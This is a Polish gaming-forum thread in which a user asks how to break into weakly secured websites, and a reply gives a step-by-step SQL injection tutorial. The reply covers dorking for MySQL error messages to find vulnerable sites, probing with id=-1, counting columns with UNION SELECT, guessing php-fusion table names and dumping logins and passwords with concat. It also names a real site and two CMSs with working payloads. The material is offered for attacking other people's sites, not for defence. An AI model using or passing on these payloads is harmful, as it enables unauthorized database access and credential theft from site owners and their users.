Skocz do zawartości

  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

Sql Inject

TabaCa3

Przez TabaCa3
w MU Online

Rekomendowane odpowiedzi

TabaCa3 Uczeń

TabaCa3

Opublikowano
Uczeń

TabaCa3

Opublikowano

Ostatnio zaczelem sie interesowac SQL inject czy jest mi ktos w stanie wytlumaczyc jak mozna sie wlamac na slabo zebezpieczona strone? i jak dostac sie przez to do bazy z gory thx;)

25631777ldd4.jpg

 

kilo_kartofli Arcymistrz

kilo_kartofli

Opublikowano
Arcymistrz

kilo_kartofli

Opublikowano

1) Aby znaleźć stronę podatną na atak SQL Injection, musimy po zmiennej : na przykład "id" wstawić " -1 " albo " ' " ,aby wyświetlił się nam błąd:

Warning: mysql_fetch_array

Przykład:

Code:

 

http://www.xxxxx.com/?id=-1

 

Jeśli wyświetlił się nam błąd to jest to już połowa sukcesu.

 

Pare wyjaśnień:

id - nie musi to być tylko id, może być również ind lub asd oraz qwe.

Dlaczego -1 ? - Otóż może to być też -123, nam chodzi tylko i wyłącznie o to, by wygenerować błąd.

Znajdziemy również jakąkolwiek strone wpisując w google:

Warning: mysql_fetch_array - wtedy nie musimy wpisywać ? -1 ? bo błąd już nam się wyświetlił

 

2) Następnie do paska adresu wpisujemy "union select 1/*" :

Code:

 

http://www.xxxxx.com/?id=-1 union select 1/*

 

"1" oznacza liczbę kolumn w bazie mysql

po wpisaniu union select powinna się nam wyprintować jakaś liczba np: "2"

ale raczej nam się nie wyprintuje i wyświetli się bład ...

więc sprawdzamy większą liczbę kolumn:

Code:

 

http://www.xxxxx.com/?id=-1 union select 1,2/*

 

jesli dalej mamy błąd to próbujemy dalej aż do skutku

 

3) Jeśli wyprintuje się nam na przykład "2" to musimy znalezc nazwę bazy wpisując:

Code:

 

http://www.xxxxx.com/?id=-1 union select 1,2,3,4 from admins/*

 

Jesli błąd się nie pojawi to jest ok ale jesli się pojawi to sprawdzamy inne nazwy na przykład do php-fusion:

fusion_new_users

fusion_user_groups

fusion_users

 

i będzie to wyglądać tak:

Code:

 

http://www.xxxxx.com/?id=-1 union select 1,2,3,4 from fusion_new_users/*

 

4) No i jeśli znowu wyprintuje się nam dwójka tzn. ,że znaleźliśmy bazę i wystarczy teraz w miejsce dwójki wpisać: login,haslo,e-mail i cokolwiek chcemy, jednak musimy to odpowiednio nazwać:

login,user,user_id,id,nick

haslo,pass,password,passwd:

Code:

 

http://www.xxxxx.com/?id=-1 union select 1,concat(login,char(58),pass),3,4 from fusion_new_users/*

 

 

 

 

 

 

 

 

 

 

 

 

 

na przykładzie moheroweberety.com.pl była to strona jportal podatna na ataki (teraz na jportal są zabezpieczenia.

?topic=-100%20union%20select%201,pass,3,4,5%20from%20admins%20limit%201/*

mini-nuke-też jest zabugowana

?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=1

jeśli masz pytania to pisz

chciałem na Pw ale ma zablokowane albo przepełnioną

 

prosze o nie usuwanie i nie dawanie mi ostrzeżenia
TabaCa3 Uczeń

TabaCa3

Opublikowano
Uczeń

TabaCa3

  • Autor
Opublikowano

Mam cos nei tak z skrzynka pisze ze nei moge jej uzywac (tzn nie mam uprawnien) napisz na gg :9001458 mam pare pytan ;)

25631777ldd4.jpg

 

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Zaloguj się poniżej.

Zaloguj się
Tematy
×
×
  • Dodaj nową pozycję...